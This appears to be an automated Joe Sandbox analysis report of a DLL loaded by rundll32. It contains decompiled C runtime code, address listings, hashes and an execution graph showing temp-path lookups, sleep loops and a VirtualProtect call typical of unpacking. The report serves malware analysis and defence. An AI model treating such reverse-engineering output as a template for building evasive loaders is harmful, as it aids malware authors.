                          0x6e20375d
                          0x6e20375f
                          0x6e203762
                          0x6e203768
                          0x6e2037b3
                          0x6e2037b6
                          0x6e2037b8
                          0x00000000
                          0x6e2037ba
                          0x6e2037c2
                          0x6e2037c7
                          0x6e2037cf
                          0x6e2037d2
                          0x6e2037da
                          0x6e2037e2
                          0x6e2037e9
                          0x6e2037ea
                          0x6e2037eb
                          0x6e2037ee
                          0x6e2037ef
                          0x6e2037f2
                          0x6e2037f3
                          0x6e2037f6
                          0x6e2037f7
                          0x6e2037fa
                          0x6e2037fb
                          0x6e2037fe
                          0x6e2037ff
                          0x6e203802
                          0x6e203803
                          0x6e203806
                          0x6e203807
                          0x6e20380a
                          0x6e20380b
                          0x6e203811
                          0x6e203818
                          0x6e20381a
                          0x6e20381d
                          0x6e20381f
                          0x6e203822
                          0x6e203822
                          0x6e203825
                          0x6e203825
                          0x6e20376a
                          0x6e20376a
                          0x00000000
                          0x6e2037ae
                          0x00000000
                          0x00000000
                          0x6e203771
                          0x00000000
                          0x00000000
                          0x6e203782
                          0x00000000
                          0x00000000
                          0x6e203789
                          0x00000000
                          0x00000000
                          0x6e203797
                          0x00000000
                          0x00000000
                          0x6e20379c
                          0x6e20379f
                          0x00000000
                          0x00000000
                          0x6e2037a5
                          0x6e2037a8
                          0x00000000
                          0x00000000
                          0x6e203790
                          0x6e203776
                          0x6e203776
                          0x6e203778
                          0x6e20377f
                          0x00000000
                          0x00000000
                          0x6e20376a
                          0x00000000

                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6E203758
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E2037E2
                          Strings
                          • 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1, xrefs: 6E2037BA
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8H_prolog3_Throw
                          • String ID: 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1
                          • API String ID: 2985221223-1287915644
                          • Opcode ID: 31da3b1f44f4be00057729179f4b672d7c9ef136296f14a90f710bfa915b1374
                          • Instruction ID: c772e41be5f7b2f332d735131a26b9f89d4a247c623edb0674636bff832eaf76
                          • Opcode Fuzzy Hash: 31da3b1f44f4be00057729179f4b672d7c9ef136296f14a90f710bfa915b1374
                          • Instruction Fuzzy Hash: 9A0180B586860DAFD7129FE5C848FECB3FBBF26316F10891A9080960E0EB741685C752
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E254B79, Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E254B79(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E6E231F60(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E6E242281())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t25 = _t70 + 1; // 0x1
							_t56 = _t25;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E6E242281())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E6E258CAB(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E6E242281())) = 0x16;
					return E6E24215B() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}




























                          0x6e254b79
                          0x6e254b82
                          0x6e254b87
                          0x6e254b8a
                          0x6e254b8e
                          0x6e254b9d
                          0x6e254ba0
                          0x6e254bc0
                          0x6e254bc5
                          0x6e254bc8
                          0x6e254bca
                          0x6e254c98
                          0x6e254c9e
                          0x6e254cb3
                          0x6e254cbf
                          0x6e254cc5
                          0x6e254cc7
                          0x6e254cd6
                          0x6e254cd6
                          0x6e254cd6
                          0x6e254cd9
                          0x6e254cd9
                          0x6e254cdd
                          0x6e254cdf
                          0x6e254ce2
                          0x6e254ce2
                          0x6e254ce2
                          0x6e254ce2
                          0x00000000
                          0x6e254ce9
                          0x6e254cce
                          0x00000000
                          0x6e254cce
                          0x6e254ca0
                          0x6e254ca3
                          0x6e254ca3
                          0x6e254ca6
                          0x6e254ca6
                          0x6e254ca8
                          0x6e254ca9
                          0x6e254ca9
                          0x6e254cad
                          0x00000000
                          0x6e254cad
                          0x6e254bd0
                          0x6e254bd6
                          0x6e254c03
                          0x6e254c0f
                          0x6e254c15
                          0x6e254c17
                          0x00000000
                          0x00000000
                          0x6e254c1d
                          0x6e254c23
                          0x6e254c26
                          0x6e254c82
                          0x6e254c87
                          0x6e254c8f
                          0x00000000
                          0x6e254c8f
                          0x6e254c28
                          0x6e254c2b
                          0x6e254c2d
                          0x6e254c30
                          0x6e254c32
                          0x6e254c34
                          0x6e254c6a
                          0x6e254c78
                          0x6e254c7e
                          0x6e254c80
                          0x6e254c94
                          0x00000000
                          0x6e254c94
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e254c36
                          0x6e254c36
                          0x6e254c36
                          0x6e254c39
                          0x6e254c3c
                          0x6e254c3e
                          0x00000000
                          0x00000000
                          0x6e254c48
                          0x6e254c4f
                          0x6e254c52
                          0x6e254c54
                          0x6e254c5c
                          0x6e254c5c
                          0x6e254c5f
                          0x6e254c60
                          0x6e254c63
                          0x6e254c65
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e254c65
                          0x6e254c56
                          0x6e254c57
                          0x6e254c5a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e254c5a
                          0x6e254c67
                          0x00000000
                          0x6e254c67
                          0x6e254bd8
                          0x6e254bda
                          0x00000000
                          0x00000000
                          0x6e254be0
                          0x6e254be3
                          0x6e254be7
                          0x6e254bea
                          0x6e254bee
                          0x00000000
                          0x00000000
                          0x6e254bf4
                          0x6e254bf5
                          0x6e254bf8
                          0x6e254bfa
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e254bfc
                          0x00000000
                          0x6e254be3
                          0x6e254ba7
                          0x00000000
                          0x6e254bb2
                          0x6e254b94
                          0x6e254b9a
                          0x00000000
                          0x6e254b9a
                          0x6e254cf1

                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,96574AD2,96574AD2,00000000,00000000,00000000,00000000,00000000), ref: 6E254C0F
                          • GetLastError.KERNEL32 ref: 6E254C1D
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E254C78
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast
                          • String ID:
                          • API String ID: 1717984340-0
                          • Opcode ID: 748f9f023c2ef1d0e81fdd432eb7eb7e7dce34a43049119b14ba9d2de7faa853
                          • Instruction ID: 8775ab3d8009a28f0ed7ee8adb2f68d99103e5b50beb331d8458cda2a1d64c2a
                          • Opcode Fuzzy Hash: 748f9f023c2ef1d0e81fdd432eb7eb7e7dce34a43049119b14ba9d2de7faa853
                          • Instruction Fuzzy Hash: 3E41F77560424FAFDB518FD5C944BAAB7BAAF81322F104159E857AB390DB318932CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Analysis Process: rundll32.exe PID: 6032 Parent PID: 6108 rundll32.exeCOMMON

                          Execution Graph

                          Execution Coverage:3.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:368
                          Total number of Limit Nodes:8

                          Graph

                          execution_graph 24352 6e21ae21 LCMapStringW __Towlower 24443 6e206c21 40 API calls std::_System_error_category::default_error_condition 24444 6e20c821 80 API calls 24445 6e209821 SetLastError 24448 6e201c2c GetModuleHandleA GetModuleFileNameA 23946 6e207833 23949 6e2078d3 23946->23949 23948 6e207842 23950 6e2078df __EH_prolog3 23949->23950 23955 6e21f8b6 23950->23955 23954 6e207900 ctype 23954->23948 23958 6e21f8bb 23955->23958 23957 6e2078ee 23957->23954 23963 6e207005 23957->23963 23958->23957 23960 6e21f8d7 ctype 23958->23960 23975 6e2423d2 23958->23975 23984 6e249256 7 API calls 2 library calls 23958->23984 23985 6e223d74 RaiseException 23960->23985 23962 6e220603 23964 6e207011 __EH_prolog3 23963->23964 23988 6e206653 23964->23988 23967 6e20704d 24005 6e2066ba LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 23967->24005 23970 6e20702f 24000 6e2071c4 23970->24000 23972 6e20708d ctype 23972->23954 23977 6e24f26d 23975->23977 23976 6e24f2ab 23987 6e242281 20 API calls __Stollx 23976->23987 23977->23976 23978 6e24f296 HeapAlloc 23977->23978 23982 6e24f27f std::_Locinfo::_W_Getdays 23977->23982 23980 6e24f2a9 23978->23980 23978->23982 23981 6e24f2b0 23980->23981 23981->23958 23982->23976 23982->23978 23986 6e249256 7 API calls 2 library calls 23982->23986 23984->23958 23985->23962 23986->23982 23987->23981 23989 6e206662 23988->23989 23990 6e206669 23988->23990 24006 6e2423c0 EnterCriticalSection std::_Lockit::_Lockit 23989->24006 23991 6e206667 23990->23991 24007 6e209339 EnterCriticalSection 23990->24007 23991->23967 23994 6e2071a1 23991->23994 23995 6e21f8b6 ctype 22 API calls 23994->23995 23996 6e2071ac 23995->23996 23997 6e2071c0 23996->23997 24008 6e206e05 21 API calls _Yarn 23996->24008 23997->23970 23999 6e2071be 23999->23970 24001 6e2071d0 24000->24001 24002 6e207037 24000->24002 24009 6e20db5a 24001->24009 24004 6e206f34 21 API calls 2 library calls 24002->24004 24004->23967 24005->23972 24006->23991 24007->23991 24008->23999 24010 6e20db6a RtlEncodePointer 24009->24010 24017 6e2462da 24009->24017 24010->24002 24012 6e246314 IsProcessorFeaturePresent 24012->24017 24016 6e2463c1 24016->24002 24017->24002 24017->24012 24017->24016 24018 6e257c4f EnterCriticalSection LeaveCriticalSection _Atexit 24017->24018 24019 6e257cb3 38 API calls 6 library calls 24017->24019 24020 6e241f6d 8 API calls 2 library calls 24017->24020 24021 6e249779 28 API calls _Atexit 24017->24021 24018->24017 24019->24017 24020->24017 24021->24017 24451 6e25d804 41 API calls 5 library calls 24452 6e207c02 68 API calls _Mpunct 24355 6e209a14 GetSystemTimeAsFileTime 24358 6e202262 86 API calls 2 library calls 24459 6e225860 5 API calls 2 library calls 24460 6e201c64 29 API calls 3 library calls 24361 6e20766e 43 API calls 24463 6e210041 40 API calls _Mpunct 24363 6e208643 43 API calls _Ungetc 24466 6e20844a 77 API calls std::locale::_Locimp::_Makeushloc 24369 6e21fa4c 20 API calls ___scrt_release_startup_lock 23941 6e220052 23942 6e220060 dllmain_dispatch 23941->23942 23943 6e22005b 23941->23943 23945 6e220a3d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 23943->23945 23945->23942 24469 6e21fca2 29 API calls __onexit 24373 6e1e1a9a 22 API calls _Maklocstr 24378 6e1e1e8e 28 API calls std::ios_base::_Init 24380 6e207281 27 API calls std::bad_exception::bad_exception 24476 6e220483 5 API calls ___raise_securityfailure 24022 6e21fe86 103 API calls 4 library calls 24385 6e20d693 47 API calls __Tolower 24479 6e208499 81 API calls 2 library calls 24387 6e20dae0 22 API calls std::_Stofx_v2 24482 6e20d0e1 84 API calls 2 library calls 24483 6e2080ec 42 API calls std::ios_base::_Init 24394 6e20daf7 DecodePointer 24485 6e2098fd TlsFree 24486 6e2208c1 GetStartupInfoW ___scrt_fastfail 24488 6e2098d3 TlsAlloc 24395 6e209322 InitializeCriticalSectionAndSpinCount ___crtInitializeCriticalSectionEx 24493 6e209927 TlsGetValue 24023 6e21fd29 24024 6e21fd34 24023->24024 24025 6e21fd67 dllmain_crt_process_detach 24023->24025 24026 6e21fd59 dllmain_crt_process_attach 24024->24026 24027 6e21fd39 24024->24027 24032 6e21fd43 24025->24032 24026->24032 24028 6e21fd4f 24027->24028 24029 6e21fd3e 24027->24029 24034 6e21fa20 29 API calls 24028->24034 24029->24032 24033 6e21fa3f 27 API calls 24029->24033 24033->24032 24034->24032 24494 6e20852d 67 API calls 2 library calls 24396 6e20872e 65 API calls fpos 24400 6e20e73d 40 API calls 4 library calls 24403 6e20e705 39 API calls 4 library calls 24404 6e20670c EnterCriticalSection std::_Lockit::_Lockit 24405 6e21b70c 45 API calls 5 library calls 24407 6e21b715 43 API calls 4 library calls 24408 6e209314 DeleteCriticalSection 24035 6e21ff18 24036 6e21ff24 ___scrt_is_nonwritable_in_current_image 24035->24036 24037 6e21ff4d dllmain_raw 24036->24037 24038 6e21ff48 24036->24038 24047 6e21ff33 24036->24047 24039 6e21ff67 dllmain_crt_dispatch 24037->24039 24037->24047 24048 6e201285 24038->24048 24039->24038 24039->24047 24041 6e21ff88 24042 6e21ffb4 24041->24042 24044 6e201285 83 API calls 24041->24044 24043 6e21ffbd dllmain_crt_dispatch 24042->24043 24042->24047 24045 6e21ffd0 dllmain_raw 24043->24045 24043->24047 24046 6e21ffa0 dllmain_crt_dispatch dllmain_raw 24044->24046 24045->24047 24046->24042 24049 6e201291 __EH_prolog3 __Stoullx 24048->24049 24050 6e2013aa GetSystemDirectoryA 24049->24050 24051 6e201401 __Stoullx 24050->24051 24052 6e201459 GetTempPathA 24051->24052 24053 6e20147c 24052->24053 24082 6e205dab 24053->24082 24059 6e2014f7 24112 6e204267 24059->24112 24061 6e20159b 24120 6e2020d9 24061->24120 24063 6e2015a2 24130 6e201ff2 24063->24130 24065 6e2015a9 24140 6e204401 24065->24140 24067 6e2015b5 24068 6e204401 79 API calls 24067->24068 24069 6e2015c1 24068->24069 24070 6e204197 28 API calls 24069->24070 24071 6e20168f 24070->24071 24072 6e201e10 28 API calls 24071->24072 24073 6e20169a 24072->24073 24074 6e205dab 28 API calls 24073->24074 24075 6e2016c8 24074->24075 24076 6e204197 28 API calls 24075->24076 24077 6e2016d9 24076->24077 24078 6e201e10 28 API calls 24077->24078 24079 6e2016e4 __Stoullx 24078->24079 24150 6e1ffb4a 24079->24150 24081 6e201a4b ctype 24081->24041 24157 6e206062 24082->24157 24084 6e2014dd 24085 6e204197 24084->24085 24086 6e2041a3 __EH_prolog3_GS 24085->24086 24087 6e2041c0 24086->24087 24181 6e203751 28 API calls 4 library calls 24086->24181 24089 6e2041d9 24087->24089 24090 6e20420f 24087->24090 24091 6e201f9a std::ios_base::_Init 28 API calls 24089->24091 24093 6e201f9a std::ios_base::_Init 28 API calls 24090->24093 24092 6e2041e2 24091->24092 24182 6e205c7e 28 API calls 24092->24182 24095 6e20421d 24093->24095 24185 6e2040e5 28 API calls collate 24095->24185 24096 6e2041f9 24183 6e202b76 26 API calls _Deallocate 24096->24183 24099 6e20422d 24186 6e200bc1 28 API calls 4 library calls 24099->24186 24100 6e204201 24184 6e22008a 5 API calls __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 24100->24184 24104 6e20423a 24187 6e223d74 RaiseException 24104->24187 24106 6e20424a 24107 6e205dab 28 API calls 24106->24107 24108 6e2014ec 24107->24108 24109 6e201e10 24108->24109 24188 6e201dfa 24109->24188 24114 6e204273 _wcslen __EH_prolog3_catch 24112->24114 24242 6e20220b 24114->24242 24116 6e2042d3 24246 6e203a25 24116->24246 24119 6e2043f8 ctype 24119->24061 24121 6e2020e5 __EH_prolog3_catch 24120->24121 24122 6e20220b 42 API calls 24121->24122 24123 6e2020f8 24122->24123 24124 6e20212a std::ios_base::_Ios_base_dtor 24123->24124 24267 6e2046ab 77 API calls 8 library calls 24123->24267 24125 6e203a25 42 API calls 24124->24125 24126 6e2021ab 24125->24126 24127 6e2021c1 42 API calls 24126->24127 24129 6e2021b3 ctype 24127->24129 24129->24063 24131 6e201ffe __EH_prolog3_catch 24130->24131 24132 6e20220b 42 API calls 24131->24132 24133 6e202011 24132->24133 24139 6e202043 std::ios_base::_Ios_base_dtor 24133->24139 24268 6e2046ab 77 API calls 8 library calls 24133->24268 24134 6e203a25 42 API calls 24135 6e2020c7 24134->24135 24136 6e2021c1 42 API calls 24135->24136 24138 6e2020cf ctype 24136->24138 24138->24065 24139->24134 24141 6e20440d __EH_prolog3_catch _strlen 24140->24141 24142 6e20220b 42 API calls 24141->24142 24143 6e204474 24142->24143 24149 6e20447d std::ios_base::_Ios_base_dtor 24143->24149 24269 6e204a80 77 API calls 8 library calls 24143->24269 24144 6e203a25 42 API calls 24145 6e20461a 24144->24145 24147 6e2021c1 42 API calls 24145->24147 24148 6e204622 ctype 24147->24148 24148->24067 24149->24144 24156 6e1ffb7b 24150->24156 24151 6e20096f 24270 6e1ff218 VirtualProtect __Stoullx 24151->24270 24154 6e200a25 24154->24081 24155 6e2006e7 Sleep 24155->24156 24156->24151 24156->24155 24158 6e20606e __EH_prolog3 24157->24158 24163 6e204a32 24158->24163 24160 6e206077 24171 6e201f9a 24160->24171 24162 6e20608f ctype 24162->24084 24164 6e204a45 24163->24164 24165 6e204a3d 24163->24165 24167 6e204a51 24164->24167 24169 6e21f8b6 ctype 22 API calls 24164->24169 24175 6e205940 28 API calls 2 library calls 24165->24175 24167->24160 24168 6e204a43 24168->24160 24170 6e204a4f 24169->24170 24170->24160 24172 6e201fb4 _strlen 24171->24172 24176 6e202c1c 24172->24176 24174 6e201fc1 24174->24162 24175->24168 24177 6e202c4f 24176->24177 24179 6e202c2b BuildCatchObjectHelperInternal 24176->24179 24180 6e2048ac 28 API calls 4 library calls 24177->24180 24179->24174 24180->24179 24181->24087 24182->24096 24183->24100 24185->24099 24186->24104 24187->24106 24191 6e2028d1 24188->24191 24192 6e202911 24191->24192 24193 6e20293c 24191->24193 24228 6e20385a 28 API calls std::_Winerror_message 24192->24228 24220 6e202a38 24193->24220 24230 6e20385a 28 API calls std::_Winerror_message 24193->24230 24196 6e202a73 24238 6e205025 28 API calls _Deallocate 24196->24238 24197 6e202a43 24200 6e202a68 24197->24200 24201 6e202a48 24197->24201 24198 6e202924 24229 6e2047e8 28 API calls 24198->24229 24205 6e203ba9 28 API calls 24200->24205 24203 6e202a5d 24201->24203 24204 6e202a4d 24201->24204 24237 6e202b76 26 API calls _Deallocate 24203->24237 24207 6e202a83 24204->24207 24236 6e2052f2 26 API calls _Deallocate 24204->24236 24206 6e202a59 24205->24206 24239 6e204a54 26 API calls 2 library calls 24206->24239 24222 6e203ba9 24207->24222 24214 6e202952 24221 6e202937 24214->24221 24231 6e203885 28 API calls std::_Winerror_message 24214->24231 24216 6e201dfa 28 API calls 24216->24221 24220->24196 24220->24197 24221->24216 24221->24220 24232 6e2047e8 28 API calls 24221->24232 24233 6e203bd9 28 API calls 24221->24233 24234 6e203885 28 API calls std::_Winerror_message 24221->24234 24235 6e2036e8 28 API calls 24221->24235 24223 6e203bb1 24222->24223 24224 6e201e0c 24222->24224 24240 6e203bd9 28 API calls 24223->24240 24224->24059 24226 6e203bbb 24241 6e204a54 26 API calls 2 library calls 24226->24241 24228->24198 24229->24221 24230->24214 24231->24214 24232->24221 24233->24221 24234->24221 24235->24221 24236->24206 24237->24206 24238->24206 24239->24207 24240->24226 24241->24224 24244 6e202217 __EH_prolog3 24242->24244 24243 6e202248 ctype 24243->24116 24244->24243 24253 6e203968 42 API calls 2 library calls 24244->24253 24254 6e1e1eea 24246->24254 24248 6e203a3f 24249 6e2021c1 24248->24249 24250 6e2021eb 24249->24250 24251 6e2021f6 24250->24251 24266 6e2039cd 42 API calls 2 library calls 24250->24266 24251->24119 24253->24243 24255 6e1e1f45 24254->24255 24256 6e1e1f01 24254->24256 24255->24248 24262 6e1e1f3a 24256->24262 24263 6e1e1ca2 40 API calls std::ios_base::_Init 24256->24263 24258 6e1e1f53 24258->24248 24260 6e1e1f2e 24264 6e1e1ebd 28 API calls std::ios_base::_Init 24260->24264 24265 6e223d74 RaiseException 24262->24265 24263->24260 24264->24262 24265->24258 24266->24251 24267->24124 24268->24139 24269->24149 24270->24154 24410 6e1e1b25 21 API calls 2 library calls 24502 6e203d1c 26 API calls std::_Winerror_message 24411 6e220f1c 48 API calls 2 library calls 24413 6e25df65 41 API calls 4 library calls 24414 6e223f60 6 API calls 3 library calls 24507 6e206d6b 21 API calls _Yarn 24417 6e206770 LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 24418 6e217b76 81 API calls 3 library calls 24280 6e21fd7c 24281 6e21fd88 ___scrt_is_nonwritable_in_current_image 24280->24281 24298 6e21fab0 24281->24298 24283 6e21fd8f 24284 6e21fdb9 24283->24284 24285 6e21fe7e 24283->24285 24294 6e21fd94 ___scrt_is_nonwritable_in_current_image 24283->24294 24309 6e21fa12 24284->24309 24325 6e2207a7 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24285->24325 24288 6e21fe85 24289 6e21fdc8 __RTC_Initialize 24289->24294 24312 6e220a88 InitializeSListHead 24289->24312 24291 6e21fdd6 ___scrt_initialize_default_local_stdio_options 24313 6e24aac1 24291->24313 24296 6e21fdf5 24296->24294 24321 6e24aa65 24296->24321 24299 6e21fab9 24298->24299 24326 6e220604 IsProcessorFeaturePresent 24299->24326 24301 6e21fac5 24327 6e223ead 10 API calls 3 library calls 24301->24327 24303 6e21faca 24308 6e21face 24303->24308 24328 6e24aa1c 24303->24328 24306 6e21fae5 24306->24283 24308->24283 24344 6e21fae9 24309->24344 24311 6e21fa19 24311->24289 24312->24291 24314 6e24aad8 24313->24314 24315 6e21f8a5 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 24314->24315 24316 6e21fdea 24315->24316 24316->24294 24317 6e21f9e7 24316->24317 24318 6e21f9ec ___scrt_release_startup_lock 24317->24318 24320 6e21f9f5 24318->24320 24351 6e220604 IsProcessorFeaturePresent 24318->24351 24320->24296 24324 6e24aa94 24321->24324 24322 6e21f8a5 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 24323 6e24aabd 24322->24323 24323->24294 24324->24322 24325->24288 24326->24301 24327->24303 24332 6e25aca1 24328->24332 24331 6e223eec 8 API calls 3 library calls 24331->24308 24335 6e25acba 24332->24335 24334 6e21fad7 24334->24306 24334->24331 24336 6e21f8a5 24335->24336 24337 6e21f8b0 IsProcessorFeaturePresent 24336->24337 24338 6e21f8ae 24336->24338 24340 6e2202c4 24337->24340 24338->24334 24343 6e220288 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24340->24343 24342 6e2203a7 24342->24334 24343->24342 24345 6e21faf8 24344->24345 24346 6e21fafc 24344->24346 24345->24311 24349 6e21fb09 ___scrt_release_startup_lock 24346->24349 24350 6e2207a7 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24346->24350 24348 6e21fb8d 24349->24311 24350->24348 24351->24320 24419 6e208f40 30 API calls 2 library calls 24511 6e1e157a 39 API calls __Getctype 24515 6e209951 TlsSetValue 24422 6e206759 LeaveCriticalSection std::_Lockit::~_Lockit 24517 6e1e159d 38 API calls __Getcvt 24425 6e206faa 4 API calls 2 library calls 24519 6e2179ab 82 API calls 24522 6e220daf 51 API calls 2 library calls 24525 6e213db9 46 API calls 2 library calls 24426 6e209783 CreateEventW 24527 6e20a597 89 API calls std::locale::_Locimp::_Locimp_Addfac 24529 6e25e19f 44 API calls 4 library calls 24429 6e206b9d 29 API calls 3 library calls 24434 6e25e3ef 42 API calls 4 library calls 24271 6e24c7ef 24277 6e24c7fc std::_Locinfo::_W_Getdays 24271->24277 24272 6e24c83c 24279 6e242281 20 API calls __Stollx 24272->24279 24273 6e24c827 RtlAllocateHeap 24274 6e24c83a 24273->24274 24273->24277 24277->24272 24277->24273 24278 6e249256 7 API calls 2 library calls 24277->24278 24278->24277 24279->24274 24530 6e20c9ec 79 API calls 3 library calls 24437 6e20fff3 42 API calls _Mpunct 24532 6e2071fa 44 API calls std::locale::_Init 24438 6e219ffa GetStringTypeW __Getwctypes 24533 6e2171c4 56 API calls std::locale::_Locimp::_Makeushloc

                          Executed Functions

                          Function 6E201285, Relevance: 39.1, APIs: 3, Strings: 19, Instructions: 597COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
